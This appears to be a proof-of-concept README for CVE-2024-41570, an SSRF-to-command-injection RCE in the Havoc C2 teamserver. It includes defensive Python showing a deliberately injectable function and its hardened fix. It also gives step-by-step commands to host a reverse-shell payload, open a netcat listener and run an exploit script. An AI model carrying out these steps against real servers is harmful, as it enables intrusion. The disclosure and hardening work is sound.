CVE-2024-41570: Havoc C2 Authenticated RCE via SSRF Chain
TL;DR:
Authenticated Remote Code Execution in Havoc C2 framework by chaining SSRF with command injection to execute arbitrary commands on the teamserver.
Summary
A proof-of-concept exploit for CVE-2024-41570, a Remote Code Execution vulnerability in the Havoc C2 framework. The exploit uses a Server-Side Request Forgery (SSRF) flaw in the teamserver to reach its internal management service, which would otherwise only be reachable on the loopback interface, and then, with valid operator credentials, abuses a command injection flaw in one of that service's endpoints to run arbitrary commands on the teamserver.
CVE ID: CVE-2024-41570
Affected Software: Havoc C2 Framework
Vulnerability Type: SSRF → Authenticated Command Injection → RCE
Attack Chain
SSRF → Authenticated Endpoint Access → Command Injection → Reverse Shell
The SSRF flaw lets an attacker who can reach a listener, without any operator credentials, make the teamserver open TCP connections to hosts of the attacker's choosing. Pointing that connection at the teamserver's own management service (127.0.0.1:40056 in the exploit invocation below) gives the attacker a path to endpoints that were only ever meant to be reached from localhost. Those endpoints still require an operator login, which is why this is an authenticated RCE; once logged in, one of them passes attacker-controlled input to an OS command, so the injected command runs as the teamserver process. The practical lesson for anyone hosting a teamserver is that binding the management port to loopback is not an access control on its own: anything the teamserver itself can be talked into connecting to is reachable from the listener.
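The two weaknesses in the chain, modelled side by side so the fix for each is concrete. This is a constructed illustration added here; it is not code from Havoc or from the exploit repository. The function names, the `register-listener` placeholder command (with `echo` standing in for whatever helper a real service would run), the blocked-destination policy and the sample hosts are all assumptions made for the example.

```python
"""Model of the chain: an agent-driven 'open a socket to host:port' feature
(the SSRF) and a management endpoint that splices operator input into a
shell command (the injection). Added example, not Havoc's code."""
import ipaddress
import re
import socket
import subprocess

# Port of the management service the exploit is pointed at (127.0.0.1:40056).
# Policy assumption for this example: an agent-driven socket may never target it.
MGMT_PORT = 40056


def _default_resolver(host):
    """Every address a name resolves to; a name may map to several."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_blocked_socket_target(host, port, resolver=_default_resolver):
    """SSRF guard for a socket request that arrives from an agent.
    Refuse loopback, link-local, unspecified and multicast destinations and
    the management port on any address. Every resolved address is checked,
    so a name mapping to both a public and a loopback address is refused.
    Unresolvable names fail closed."""
    port = int(port)
    if not 1 <= port <= 65535 or port == MGMT_PORT:
        return True
    try:
        ips = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            ips = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError):
            return True
    for ip in ips:
        # ::ffff:127.0.0.1 is not IPv6 loopback; unwrap IPv4-mapped addresses
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if ip.is_loopback or ip.is_link_local or ip.is_unspecified or ip.is_multicast:
            return True
    return False


_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
_HOST_RE = re.compile(r"[A-Za-z0-9.:-]{1,253}")


def register_listener_vulnerable(name, host, port):
    """The anti-pattern: operator-supplied fields formatted into one shell
    string. Reached through the SSRF above with a valid login, an attacker
    controls these fields and can put shell metacharacters in them."""
    cmd = f"echo register-listener --name {name} --host {host} --port {port}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def register_listener_safe(name, host, port):
    """Hardened form: validate each field against a strict shape, reject
    rather than sanitise, and invoke the helper with an argument vector so
    no shell ever parses the values."""
    if not _NAME_RE.fullmatch(name):
        raise ValueError("bad listener name")
    if not _HOST_RE.fullmatch(host):
        raise ValueError("bad host")
    port = int(port)
    if not 1 <= port <= 65535:
        raise ValueError("bad port")
    argv = ["echo", "register-listener", "--name", name,
            "--host", host, "--port", str(port)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed inputs: a loopback target via the SSRF, then an injected host field.
    print("loopback blocked:", is_blocked_socket_target("127.0.0.1", MGMT_PORT))
    print("mapped loopback blocked:", is_blocked_socket_target("::ffff:127.0.0.1", 8080))
    injected = "10.0.0.5; echo INJECTED"
    print("vulnerable:", register_listener_vulnerable("http", injected, 443))
    try:
        register_listener_safe("http", injected, 443)
    except ValueError as e:
        print("safe rejected:", e)
```

Running the vulnerable function with the injected host prints a second line, `INJECTED --port 443`, because `/bin/sh` split the string at the semicolon; the safe version refuses the same input before anything is executed. The destination guard is deliberately a policy layer on top of, not a substitute for, authenticating the agent that asks for the socket.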
Exploitation
Setup
git clone https://github.com/dxlerYT/Havoc-C2-RCE-2024.git
cd Havoc-C2-RCE-2024
Steps
- Edit payload.sh with the reverse shell payload the teamserver should run; it must call back to the port the listener below waits on (4444 in this example)
- Host the payload so the teamserver can fetch it, and start the listener that will catch the shell. Both need to be up before the exploit is launched, since the injected command fetches and runs the payload as soon as it fires:
python3 -m http.server 8000
nc -nvlp 4444
- Launch the exploit against the Havoc teamserver. --target is the listener URL through which the exploit reaches the teamserver; -i and -p are the loopback address and port of the teamserver's management service that the SSRF is pointed at (40056 is Havoc's default):
sudo python3 exploit.py --target https://$IP -i 127.0.0.1 -p 40056
Impact
- Full RCE on the teamserver: arbitrary commands run as the teamserver process
- Lateral movement: from the teamserver, pivot to the operator workstations connected to it and to every host running an implant
- Campaign compromise: full control of the red team's C2 infrastructure, including every active session